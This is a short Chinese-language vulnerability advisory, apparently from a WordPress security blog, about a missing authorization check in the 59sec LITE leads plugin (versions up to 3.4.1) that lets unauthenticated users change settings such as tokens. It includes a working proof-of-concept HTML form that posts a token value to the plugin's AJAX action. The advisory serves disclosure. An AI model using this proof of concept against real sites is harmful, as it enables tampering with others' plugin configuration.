WordPress THE Leads Management System: 59sec LITE plugin

WordPress THE Leads Management System: 59sec LITE plugin <= 3.4.1 未经认证用户随意更改插件配置

- August 13, 2022 - admin

由于缺少对AJAX的授权认证，导致未经认证用户随意更改插件配置，比如保存插件的tokens设置，

以下为POC

< html>
< body>
< form action=”http://exsample.com/wp-admin/admin-ajax.php?action=59sec_save_tokens” method=”POST” enctype=”multipart/form-data”>
< input type=”hidden” name=”device_token” value=”anyvalue”>
< input type=”submit” name=”Submit”>
< /form>
< /body>
< /html>

Security For WordPress Plugin Vulnerabilities

WordPress THE Leads Management System: 59sec LITE plugin <= 3.4.1 未经认证用户随意更改插件配置

Archives

Categories